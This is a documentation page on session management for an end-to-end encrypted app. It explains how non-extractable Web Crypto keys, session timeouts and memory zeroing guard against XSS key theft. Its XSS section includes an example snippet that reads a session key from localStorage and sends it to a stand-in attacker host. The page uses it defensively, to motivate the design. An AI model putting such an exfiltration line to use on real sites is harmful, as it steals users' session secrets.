Onera Docs
E2EE Architecture

Session Management

Browser sessions and XSS protection with non-extractable keys

Session Management

Session Key Architecture

Browser sessions use the Web Crypto API's non-extractable keys for XSS protection:

XSS Protection

Traditional localStorage-based session storage is vulnerable to XSS attacks:

// XSS attack can steal localStorage
const stolen = localStorage.getItem('session_key');
fetch('https://attacker.com/steal', { body: stolen });

With non-extractable keys:

// Even with code execution, export fails
const key = await getSessionKeyFromIndexedDB();
await crypto.subtle.exportKey('raw', key);
// Throws: InvalidAccessError: key is not extractable

Session Lifecycle

Session Configuration

interface SecuritySettings {
  sessionTimeoutMs: number;      // Default: 30 minutes
  strictSessionLocking: boolean; // Clear on page hide
}

Memory Clearing

On session lock:

function lockSession() {
  // Clear in-memory keys
  if (decryptedKeys) {
    sodium.memzero(decryptedKeys.masterKey);
    sodium.memzero(decryptedKeys.privateKey);
    decryptedKeys = null;
  }

  // Clear LRU cache
  chatKeyCache.forEach((key) => sodium.memzero(key));
  chatKeyCache.clear();

  // Clear IndexedDB session
  await clearIndexedDBSession();

  // Update state
  e2eeState = 'locked';
}

Security Guarantees

ThreatProtection
XSS key theftNon-extractable Web Crypto keys
Session hijackingKeys bound to browser instance
Idle session exposureAutomatic timeout after inactivity
Memory dumpingKeys zeroed on lock

Encryption Flows

Chat, credential, and notes encryption flows

Recovery Mechanisms

BIP39 mnemonic and account recovery

On this page

Session ManagementSession Key ArchitectureXSS ProtectionSession LifecycleSession ConfigurationMemory ClearingSecurity Guarantees